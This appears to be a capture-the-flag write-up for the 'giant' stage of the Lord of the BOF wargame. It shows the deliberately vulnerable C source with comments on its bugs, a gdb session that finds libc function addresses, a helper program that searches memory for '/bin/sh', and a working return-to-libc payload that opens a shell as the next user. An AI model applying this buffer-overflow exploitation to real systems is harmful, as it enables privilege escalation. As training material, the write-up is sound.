login : bugbear
password : new divide
[bugbear@localhost bugbear]$ cat giant.c
/*
The Lord of the BOF : The Fellowship of the BOF
- giant
- RTL2
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/*
 * Challenge binary for the "giant" stage: takes one argument, copies it into a
 * 40-byte stack buffer, and only proceeds when the 4 bytes at argv[1][44..47]
 * equal the address of execve() resolved at run time (the "RTL2" header and
 * the "You must use execve!" message mark this as a return-into-libc stage).
 *
 * Defects to be aware of when reading this as vulnerable-by-design code:
 *  - `main` has an implicit int return type (pre-C99 form) and no return;
 *  - memcpy()/strcpy() are called without <string.h>;
 *  - fgets() is passed a size of 255 for a 40-byte buffer, so the command
 *    output itself can overrun `buffer`, and its return value is unchecked;
 *  - streams opened with popen() are closed with fclose() instead of pclose();
 *  - sscanf("%x") stores through `char **` although the conversion expects
 *    `unsigned int *`;
 *  - memcpy() reads argv[1][44..47] with no check that argv[1] is that long;
 *  - strcpy() copies argv[1] unbounded into the 40-byte buffer, which is the
 *    overflow the stage is built around — a length check before the copy
 *    (rejecting inputs of 40 bytes or more) is the straightforward fix.
 */
main(int argc, char *argv[])
{
char buffer[40]; // reused for the two popen() reads and for the argv[1] copy
FILE *fp;
char *lib_addr, *execve_offset, *execve_addr; // pointer-typed holders for numbers parsed with "%x" (see notes above)
char *ret; // the 4 bytes read from argv[1][44]; compared with execve_addr
if(argc < 2){
printf("argv error\n");
exit(0); // note: exits with status 0 even on this error path
}
// gain address of execve
// Runs a shell pipeline and parses the libc load address out of ldd's
// "(0x...)" column for a hard-coded binary path; no check that popen() succeeded.
fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
fgets(buffer, 255, fp); // BUG: size 255 > sizeof buffer (40); return value unchecked
sscanf(buffer, "(%x)", &lib_addr); // "%x" needs unsigned int *, not char ** — type mismatch (UB), same width only on an ILP32 build
fclose(fp); // should be pclose() for a popen() stream; fclose() does not reap the child
// Same pattern for the __execve symbol offset inside libc.
fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
fgets(buffer, 255, fp); // BUG: same oversized length and unchecked return as above
sscanf(buffer, "%x", &execve_offset); // same "%x" into char ** mismatch as above
fclose(fp); // should be pclose()
execve_addr = lib_addr + (int)execve_offset; // base + offset; the pointer-to-int cast truncates on 64-bit, fine on the 32-bit build this page shows
// end
memcpy(&ret, &(argv[1][44]), 4); // reads argv[1][44..47] without verifying argv[1] has 48 bytes — out-of-bounds read for shorter arguments
if(ret != execve_addr) // the 4 bytes at offset 44 must equal the resolved execve address
{
printf("You must use execve!\n");
exit(0); // exits with status 0 on this error path too
}
strcpy(buffer, argv[1]); // BUG: unbounded copy into a 40-byte stack buffer — the stage's intended overflow
printf("%s\n", buffer);
} // no return statement: relies on the pre-C99 implicit-int main convention
구해야할것
1. execve함수의 주소
2. system, exit함수의 주소
3. "/bin/sh"의 주소
(gdb) b *main
Breakpoint 1 at 0x8048560
(gdb) r
Starting program: /home/bugbear/test
Breakpoint 1, 0x8048560 in main ()
(gdb) p execve
$1 = {<text variable, no debug info>} 0x400a9d48 <__execve>
(gdb) p system
$2 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) p exit
$3 = {void (int)} 0x400391e0 <exit>
[bugbear@localhost bugbear]$ cat getaddr.c
#include <stdio.h>
#include <string.h>
/*
 * Helper used in this write-up to locate the "/bin/sh" string inside the
 * mapped libc: starting at the execve address printed by gdb above
 * (0x400a9d48), it advances one byte at a time until the 8 bytes at the
 * current address equal "/bin/sh\0", then prints that address.
 *
 * Notes: the local named `system` holds execve's address (not system()'s)
 * and shadows the library function's name, which is misleading; passing a
 * `long` for "%x" is a format/type mismatch (`%lx` is the matching specifier;
 * on the ILP32 build these 32-bit addresses indicate, the widths coincide so
 * the printed value is still correct); the scan has no upper bound and reads
 * process memory until a match, so on a layout without the string it would
 * fault rather than terminate.
 */
int main(){
long system = 0x400a9d48; // execve address from the gdb session above (despite the name)
while (memcmp((void*)system, "/bin/sh\x00", 8)){ // integer-to-pointer conversion; assumes the address range is mapped
system++; // byte-wise scan, no end condition
}
printf("/bin/sh: %x\n", system); // format mismatch: long passed for "%x" (see header)
return 0;
}
[bugbear@localhost bugbear]$ ./getaddr
/bin/sh: 400fbff9
[bugbear@localhost bugbear]$ ./giant "`python -c 'print "a"*44 + "\x48\x9d\x0a\x40" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH▒
@▒@▒@▒@
bash$ whoami
giant
bash$ my-pass
euid = 514
one step closer